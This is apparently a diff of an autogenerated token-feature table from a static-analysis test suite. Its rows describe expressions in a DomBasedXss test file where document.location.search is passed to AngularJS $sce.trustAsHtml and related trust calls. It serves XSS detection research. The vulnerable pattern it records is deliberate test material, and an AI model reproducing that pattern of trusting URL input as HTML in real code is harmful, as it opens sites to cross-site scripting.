$sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | exceptional return of $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | exceptional return of $sce.tr ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | exceptional return of $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | exceptional return of $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | exceptional return of $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:14:86:20 | trustAs | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:14:86:20 | trustAs | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:14:86:20 | trustAs | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:14:86:20 | trustAs | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:14:86:20 | trustAs | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:86:22:86:28 | UNKNOWN | CalleeFlexibleAccessPath | $sce.trustAs | | autogenerated/Xss/DomBasedXss/tst.js:86:22:86:28 | UNKNOWN | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:86:22:86:28 | UNKNOWN | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16323,6 +113785,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:86:22:86:28 | UNKNOWN | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:86:22:86:28 | UNKNOWN | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:86:22:86:28 | UNKNOWN | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:38 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:38 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:38 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:38 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:38 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:47 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:47 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:47 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:47 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:31:86:47 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:86:31:86:54 | documen ... .search | CalleeFlexibleAccessPath | $sce.trustAs | | autogenerated/Xss/DomBasedXss/tst.js:86:31:86:54 | documen ... .search | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:86:31:86:54 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16331,6 +113803,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:86:31:86:54 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:86:31:86:54 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:86:31:86:54 | documen ... .search | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:86:40:86:47 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:40:86:47 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:40:86:47 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:40:86:47 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:40:86:47 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:49:86:54 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:49:86:54 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:49:86:54 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:49:86:54 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:49:86:54 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:14 | $other | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:14 | $other | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:14 | $other | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:14 | $other | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:14 | $other | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:26 | $other.trustAsHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:26 | $other.trustAsHtml | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:26 | $other.trustAsHtml | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:26 | $other.trustAsHtml | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:26 | $other.trustAsHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | $other. ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | $other. ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | $other. ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | $other. ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | $other. ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | exceptional return of $other. ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | exceptional return of $other. ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | exceptional return of $other. ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | exceptional return of $other. ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:9:87:52 | exceptional return of $other. ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:16:87:26 | trustAsHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:16:87:26 | trustAsHtml | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:16:87:26 | trustAsHtml | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:16:87:26 | trustAsHtml | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:16:87:26 | trustAsHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:35 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:35 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:35 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:35 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:35 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:44 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:44 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:44 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:44 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:28:87:44 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:87:28:87:51 | documen ... .search | CalleeFlexibleAccessPath | $other.trustAsHtml | | autogenerated/Xss/DomBasedXss/tst.js:87:28:87:51 | documen ... .search | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:87:28:87:51 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16339,16 +113856,89 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:87:28:87:51 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:87:28:87:51 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:87:28:87:51 | documen ... .search | receiverName | $other | +| autogenerated/Xss/DomBasedXss/tst.js:87:37:87:44 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:37:87:44 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:37:87:44 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:37:87:44 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:37:87:44 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:87:46:87:51 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:87:46:87:51 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:87:46:87:51 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:87:46:87:51 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:87:46:87:51 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:89:6:89:12 | service | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:89:6:89:12 | service | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:89:6:89:12 | service | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:89:14:89:25 | "myService2" | CalleeFlexibleAccessPath | angular.module().service().service | | autogenerated/Xss/DomBasedXss/tst.js:89:14:89:25 | "myService2" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:89:14:89:25 | "myService2" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:89:14:89:25 | "myService2" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:89:14:89:25 | "myService2" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:89:27 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:89:27 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:89:28:89:27 | this | enclosingFunctionBody | angular element
    html document location search angular element
